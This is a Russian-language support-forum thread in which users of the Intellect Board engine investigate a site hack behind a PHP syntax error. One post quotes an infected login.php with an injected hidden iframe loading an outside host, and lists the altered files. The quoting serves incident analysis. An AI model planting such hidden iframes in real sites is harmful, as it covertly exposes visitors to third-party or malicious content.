syntax error, unexpected '<' in auth.php on line 318

Intellect Board — cистема управления сайтом

Построение сайта на основе форума

Intellect Board — cистема управления сайтом »   Техническая поддержка версии 2.19 »   syntax error, unexpected '<' in auth.php on line 318
RSS

syntax error, unexpected '<' in auth.php on line 318

Текущий рейтинг темы: Нет
Выводить сообщения

<<Назад  Вперед>>Страницы: 1 * 2
Модераторы: aerograf, wsx
Печать
 
eugrus
Участник Проекта

eugrus
Всего сообщений: 420
Рейтинг пользователя: 5


Ссылка


Дата регистрации на форуме:
14 мар. 2005

Yuras написал:
[q]
это может быть сетевой вирус, крадущий пароли от ftp. Касперский не ругается на сайте?
[/q]


Я почти не пользуюсь Win32, так что маловероятно.

---
Russian UNIX Forums
Yuras
Долгожитель форума


Всего сообщений: 382
Рейтинг пользователя: 11


Ссылка


Дата регистрации на форуме:
15 мар. 2007
eugrus, а не баннеры ли это, вставляемые хостером (так называемый "бесплатный хостинг")?
4X_Pro
Руководитель Проекта
Настоящий Компьютерщик
4X_Pro
Откуда: Москва
Всего сообщений: 3299
Рейтинг пользователя: 70


Ссылка


Дата регистрации на форуме:
29 сен. 2001
Это одно из двух: либо баннеры, либо поражение вирусом. Я однажды наблюдал нечто подобное на valuehostе — тогда такое вставилось в конец каждого файла (причем на двух разных сайтах, один из которых был вообще не на IntB). Непонятно только одно: был ли это взломан сам движок или хостинг.

---
Спорить со мной по поводу того, что в IntB будет, а чего нет -- бесполезно!
eugrus
Участник Проекта

eugrus
Всего сообщений: 420
Рейтинг пользователя: 5


Ссылка


Дата регистрации на форуме:
14 мар. 2005
Сегодня повторилось.

Что это такое ясно и так. Вопрос лишь: как оно появилось.

Написал конечно хостеру, НО мне кажется, в движке обнаружена новая уязвимость: в момент, когда открывался форум кроме порноресурса было ещё соединение с forum.antichat.ru

К сожалению сейчас (до повторного появления) точно сказать не смогу.

---
Russian UNIX Forums
eugrus
Участник Проекта

eugrus
Всего сообщений: 420
Рейтинг пользователя: 5


Ссылка


Дата регистрации на форуме:
14 мар. 2005
Хотя нет, смогу. Я заменил *.php файлы только из главного каталога, а вложенные остались. Так что эти соединения висят.

Если кто-то займётся анализом, могу кинуть архив с файлами.

---
Russian UNIX Forums
Gram
Администратор

Gram
Откуда: Нижний Новгород
Всего сообщений: 1011
Рейтинг пользователя: 38


Ссылка


Дата регистрации на форуме:
23 июля 2003
В личку!
eugrus
Участник Проекта

eugrus
Всего сообщений: 420
Рейтинг пользователя: 5


Ссылка


Дата регистрации на форуме:
14 мар. 2005
Сомнений почти не осталось: было ни что иное как взлом средствами скрипта.

---
Russian UNIX Forums
eugrus
Участник Проекта

eugrus
Всего сообщений: 420
Рейтинг пользователя: 5


Ссылка


Дата регистрации на форуме:
14 мар. 2005
Кстати, внедрение осуществлено весьма изящно, скажем вот login.php:

<?

if (!$_GET['a']) { header("Location: http://".$_SERVER['SERVER_NAME']."/index.php?m=profile&a=login"); }

else { ?>

<html><head>

<link rel="stylesheet" href="styles/abstract/abstract.css" type="text/css">

</head><body bgcolor=#e5e5e5><iframe src='http://ltds.biz/go.php?id=3240&user_name=gh0st' width='1' height='1' style='visibility: hidden;'></iframe>

<div>рЕОЕПЭ БШ ЛНФЕРЕ:<ul>

<li><a href="index.php">оЕПЕИРХ МЮ ЦКЮБМСЧ ЯРПЮМХЖС</a>

<li><a href="http://www.vv.kz/index.php?f=15&a=an_form">дНАЮБХРЭ НАЗЪБКЕМХЕ</a>

<li><a href="admin/index.php">оЕПЕИРХ Б жЕМРП юДЛХМХЯРПХПНБЮМХЪ</a>

<li><a href="index.php?m=moderate&a=premod">оЕПЕИРХ Й ОПЕЛНДЕПЮЖХХ</a>

<li><a href="http://www.vv.kz/index.php?f=98&a=add_article">дНАЮБХРЭ ЯРЮРЭЧ</a>

</ul></div>

<? }

---
Russian UNIX Forums
eugrus
Участник Проекта

eugrus
Всего сообщений: 420
Рейтинг пользователя: 5


Ссылка


Дата регистрации на форуме:
14 мар. 2005
Изменены в ходе взлома были следующие файлы:

~/unixforums/login.php
~/unixforums/index.php
~/unixforums/admin/index.php
~/unixforums/langs/ru/main.php
~/unixforums/styles/wsx/main.php
~/unixforums/styles/gradblue/main.php
~/unixforums/styles/abstract/main.php

---
Russian UNIX Forums
4X_Pro
Руководитель Проекта
Настоящий Компьютерщик
4X_Pro
Откуда: Москва
Всего сообщений: 3299
Рейтинг пользователя: 70


Ссылка


Дата регистрации на форуме:
29 сен. 2001
Особого изящества тут нет: тупо искали тег <body> и вставляли после него...
Архив пришли мне на Email, а также интересует следующее:
а) как выполняется скрипт: от имени nobody или же от имени пользователя (иными словами, как работает PHP: Apache-модуль или как CGI-приложение)
б) какие права доступа стояли на эти файлы
в) известно ли точное время взлома. Если да, то хотелось бы увидеть лог сервера за 30 минут до этого момента.

---
Спорить со мной по поводу того, что в IntB будет, а чего нет -- бесполезно!
<<Назад  Вперед>>Страницы: 1 * 2
Модераторы: aerograf, wsx
Печать
Intellect Board — cистема управления сайтом »   Техническая поддержка версии 2.19 »   syntax error, unexpected '<' in auth.php on line 318
RSS

1 посетитель просмотрел эту тему за последние 10 минут
В том числе: 1 гость, 0 скрытых пользователей

Последние RSS
Ограничение доступа
не отображаются разделы
Архив версий
Установка стиля на Intellect Board 2.22
Завершилась работа над новой версией 3.00

Самые активные 5 тем RSS


Время выполнения скрипта: 0.0619. Количество выполненных запросов: 18, время выполнения запросов 0.0000
Creative Commons License Rambler's Top100 Rambler's Top100 Рейтинг@Mail.ru Valid HTML 4.01 Transitional Valid CSS!